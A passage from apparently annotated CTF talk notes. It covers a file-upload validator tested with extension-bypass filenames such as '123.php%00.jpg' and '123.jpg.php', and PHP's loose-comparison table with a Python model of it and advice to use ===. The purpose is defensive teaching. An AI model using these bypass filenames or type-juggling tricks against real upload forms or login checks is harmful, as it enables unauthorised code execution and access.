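    return ext, secrets.token_hex(16) + "." + ext          # server-chosen name, nothing from the client


def is_acceptable_upload(filename, content_type, data):
    try:
        check_upload(filename, content_type, data)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for fn in ("123.jpg", "123.php%00.jpg", "123.jpg.php", "123.php?.jpg"):
        print("%-16s %s" % (fn, "accepted" if is_acceptable_upload(fn, "image/jpeg", JPEG_BYTES) else "rejected"))
    print("123.jpg with PHP bytes:", is_acceptable_upload("123.jpg", "image/jpeg", PHP_BYTES))
```

Even with these checks, the upload directory should be served without script execution (no PHP/ASP handler mapped there); the checker reduces what gets in, the server configuration decides what can run.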
PHP Bug?? http://ctf.mis.nkfust.edu.tw/bypass07
Loose comparison (==) table, row == column (PHP behaviour at the time of the talk; PHP 8 changed number-to-string comparison, so 0 == "php" is no longer true there):

==       TRUE   FALSE  1      0      -1     "1"    "0"    "-1"   NULL   array() "php"  ""
TRUE     TRUE   FALSE  TRUE   FALSE  TRUE   TRUE   FALSE  TRUE   FALSE  FALSE   TRUE   FALSE
FALSE    FALSE  TRUE   FALSE  TRUE   FALSE  FALSE  TRUE   FALSE  TRUE   TRUE    FALSE  TRUE
1        TRUE   FALSE  TRUE   FALSE  FALSE  TRUE   FALSE  FALSE  FALSE  FALSE   FALSE  FALSE
0        FALSE  TRUE   FALSE  TRUE   FALSE  FALSE  TRUE   FALSE  TRUE   FALSE   TRUE   TRUE
-1       TRUE   FALSE  FALSE  FALSE  TRUE   FALSE  FALSE  TRUE   FALSE  FALSE   FALSE  FALSE
"1"      TRUE   FALSE  TRUE   FALSE  FALSE  TRUE   FALSE  FALSE  FALSE  FALSE   FALSE  FALSE
"0"      FALSE  TRUE   FALSE  TRUE   FALSE  FALSE  TRUE   FALSE  FALSE  FALSE   FALSE  FALSE
"-1"     TRUE   FALSE  FALSE  FALSE  TRUE   FALSE  FALSE  TRUE   FALSE  FALSE   FALSE  FALSE
NULL     FALSE  TRUE   FALSE  TRUE   FALSE  FALSE  FALSE  FALSE  TRUE   TRUE    FALSE  TRUE
array()  FALSE  TRUE   FALSE  FALSE  FALSE  FALSE  FALSE  FALSE  TRUE   TRUE    FALSE  FALSE
"php"    TRUE   FALSE  FALSE  TRUE   FALSE  FALSE  FALSE  FALSE  FALSE  FALSE   TRUE   FALSE
""       FALSE  TRUE   FALSE  TRUE   FALSE  FALSE  FALSE  FALSE  TRUE   FALSE   FALSE  TRUE
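The table is the output of a small set of conversion rules, and seeing the rules makes the surprising cells (0 == "php", NULL == array(), "0" != NULL) predictable rather than magic. As an added example that is not from the deck, the Python below models PHP 5/7 loose comparison for the twelve values on the slide, following the order of the manual's comparison table (string-or-NULL vs string first, then bool/NULL vs anything, then arrays, then numeric), regenerates the whole table and checks it against the one on the slide; a strict (===) version is included as the fix. The value modelling (NULL as None, array() as []) and the helper names are this example's own.

```python
import re

# The twelve values from the deck's table, in the deck's order (NULL -> None, array() -> []).
VALUES = [True, False, 1, 0, -1, "1", "0", "-1", None, [], "php", ""]

# Expected results copied from the deck's table, one row per value, T/F per column.
TABLE = [
    "TFTFTTFTFFTF",  # TRUE
    "FTFTFFTFTTFT",  # FALSE
    "TFTFFTFFFFFF",  # 1
    "FTFTFFTFTFTT",  # 0
    "TFFFTFFTFFFF",  # -1
    "TFTFFTFFFFFF",  # "1"
    "FTFTFFTFFFFF",  # "0"
    "TFFFTFFTFFFF",  # "-1"
    "FTFTFFFFTTFT",  # NULL
    "FTFFFFFFTTFF",  # array()
    "TFFTFFFFFFTF",  # "php"
    "FTFTFFFFTFFT",  # ""
]

NUMERIC_PREFIX = re.compile(r"\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?")


def is_numeric_string(s):
    """PHP's notion of a numeric string: the whole string is a number (leading whitespace allowed)."""
    m = NUMERIC_PREFIX.match(s)
    return m is not None and m.end() == len(s)


def to_number(v):
    """PHP 7 conversion used by ==: ints pass through, strings use their leading numeric prefix, else 0."""
    if isinstance(v, bool):
        return 1 if v else 0
    if isinstance(v, int):
        return v
    if isinstance(v, str):
        m = NUMERIC_PREFIX.match(v)
        if not m:
            return 0                        # "php" -> 0, which is why 0 == "php"
        text = m.group(0)
        return float(text) if any(c in text for c in ".eE") else int(text)
    return 0


def to_bool(v):
    """PHP (bool) cast: "" and "0" are false, every other string is true, empty array is false."""
    if v is None:
        return False
    if isinstance(v, bool):
        return v
    if isinstance(v, int):
        return v != 0
    if isinstance(v, str):
        return v not in ("", "0")
    if isinstance(v, list):
        return len(v) > 0
    raise TypeError("unsupported value: %r" % (v,))


def php_loose_eq(a, b):
    """Model of PHP 5/7 == for bool, int, string, NULL and array, rules applied in the manual's order."""
    a_strnull = a is None or isinstance(a, str)
    b_strnull = b is None or isinstance(b, str)
    # 1. NULL or string vs string: NULL becomes "", then numeric or lexical comparison.
    if a_strnull and b_strnull and not (a is None and b is None):
        sa, sb = ("" if a is None else a), ("" if b is None else b)
        if is_numeric_string(sa) and is_numeric_string(sb):
            return to_number(sa) == to_number(sb)
        return sa == sb
    # 2. bool or NULL vs anything: both sides cast to bool (NULL == array() lands here).
    if isinstance(a, bool) or a is None or isinstance(b, bool) or b is None:
        return to_bool(a) == to_bool(b)
    # 3. array vs array: same pairs; 4. array vs anything else: never equal.
    if isinstance(a, list) and isinstance(b, list):
        return a == b
    if isinstance(a, list) or isinstance(b, list):
        return False
    # 5. number vs number/string: numeric comparison after string-to-number conversion.
    return to_number(a) == to_number(b)


def php_strict_eq(a, b):
    """===: same type and same value; a bool is never equal to an int or a string."""
    if isinstance(a, bool) != isinstance(b, bool):
        return False
    return type(a) is type(b) and a == b


def loose_table():
    return ["".join("T" if php_loose_eq(r, c) else "F" for c in VALUES) for r in VALUES]


def table_matches_deck():
    return loose_table() == TABLE


if __name__ == "__main__":
    for value, row in zip(VALUES, loose_table()):
        print("%-8r %s" % (value, " ".join(row)))
    print("matches deck:", table_matches_deck())
```

The practical reading for a login or token check: anything that compares a user-supplied string with == against a number, bool or a hash-like string inherits rows 0, "0" and "" of this table; === (or hash_equals for secrets) has none of those cross-type matches.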
Q & A